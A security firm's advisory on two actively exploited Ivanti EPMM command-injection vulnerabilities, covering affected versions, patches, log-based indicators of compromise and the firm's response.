Critical Vulnerabilities in Ivanti EPMM Under Active Exploitation (CVE-2026-1281, CVE-2026-1340)

January 29, 2026

Critical Vulnerabilities in Ivanti EPMM Under Active Exploitation (CVE-2026-1281, CVE-2026-1340)

On January 29th, Ivanti published an advisory concerning two vulnerabilities (tracked as CVE-2026-1281 and CVE-2026-1340) in their Endpoint Manager Mobile (EPMM) product. Both vulnerabilities were listed as remote command injection bugs that allow successful attackers to perform unauthenticated remote code execution (RCE) on an affected device. EPMM is often deployed directly connected to the internet, and as such can provide threat actors with initial access to an organizations network. Ivanti confirmed in their advisory that a “very limited number of customers” had been exploited at time of disclosure. Additionally, CISA added both vulnerabilities to their Known Exploited Vulnerabilities list the same day.

Executive Summary

On January 29^th, Ivanti published an advisory concerning two vulnerabilities (tracked as CVE-2026-1281 and CVE-2026-1340) in their Endpoint Manager Mobile (EPMM) product. Both vulnerabilities were listed as remote command injection bugs that allow successful attackers to perform unauthenticated remote code execution (RCE) on an affected device. EPMM is often deployed directly connected to the internet, and as such can provide threat actors with initial access to an organizations network. Ivanti confirmed in their advisory that a “very limited number of customers” had been exploited at time of disclosure. Additionally, CISA added both vulnerabilities to their Known Exploited Vulnerabilities list the same day.

No deep technical details of the bug or public proof-of-concept (PoC) exploits have been published at time of writing, however, Ivanti released patches at the time of disclosure. Beazley Security expects threat actors who are not already in possession of private weaponized exploits to study the patches and deploy their own exploits in the coming days. Beazley Security strongly recommends affected organizations apply the vendor supplied security fixes as soon as possible.

Affected Systems or Products

Product	Affected Version	Fixed Version
Ivanti Endpoint Manager Mobile (EPMM)	12.5.0.0 and prior 12.6.0.0 and prior 12.7.0.0 and prior	RPM 12.x.0.x
Ivanti Endpoint Manager Mobile (EPMM)	12.5.1.0 and prior 12.6.1.0 and prior	RPM 12.x.1.x

Mitigations / Workarounds

No mitigations or workarounds aside from the available security patches have been provided from Ivanti.

Patches

Ivanti provided software patches at the time of disclosure for the affected versions listed above. The patches are in RPM package format, and short instructions for where to get the patches and how to install the patch packages can be found in the advisory here. Additionally, Ivanti encourages customers to upgrade to 12.8.0.0 which is to be released in Q1 2026.

Indicators of Compromise

Ivanti provided good guidance on searching logs for indicators of attack and successful exploitation. Their recommendations are generic (rather than specific indicators like IPs or injected commands) and were informed by the few verified breaches that happened as a result of these vulnerabilities. Their guidance documentation with generalized indicators can be found here. We will provide a summarized version below.

The vulnerabilities affect two specific features:

In-House Application Distribution, and
Android File Transfer Configuration

Traffic to those endpoints can be reviewed in the Apache Access Log at:

/var/log/httpd/https-access_log

Normal traffic will result in HTTP response codes of 200, while exploit attempts will cause HTTP response codes of 404. More importantly, exploit attempts will show bash commands in the HTTP parameters.

The following regular expression was suggested to assist with log file triage:

^(?!127\.0\.0\.1:\d+ .*$).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404

Ivanti has also noted that in previous vulnerabilities targeting these systems, it was common for threat actors to attempt persistence post-compromise via:

webshells disguised as HTTP error pages, like 401.jsp
unexpected WAR or JAR files imported to the device

Technical Details

At the time of the disclosure no in-depth technical details were provided by Ivanti; however, their analysis guidance documentation provided enough information to understand the nature of the vulnerabilities. Specifically, the two targeted EPMM systems were: In-House Application Distribution, and Android File Transfer Configuration.

Additionally, it was noted that exploit attempts against those system endpoints will result in 404 error messages in the logs, and to look for bash commands in the HTTP parameters. This hints at a classic case of incoming, attacker-controlled HTTP traffic being passed unfiltered to code that executes injected system commands.

How Beazley Security is responding

Beazley Security is monitoring client perimeter devices through our Exposure Management Platform to identify impacted devices and support organizations in remediation of any issues found.

We are also conducting threat hunts across our MDR environment to detect potential exploitation attempts against our clients.

If you believe your organization may have been impacted by this attack campaign and need support, please contact our Incident Response team.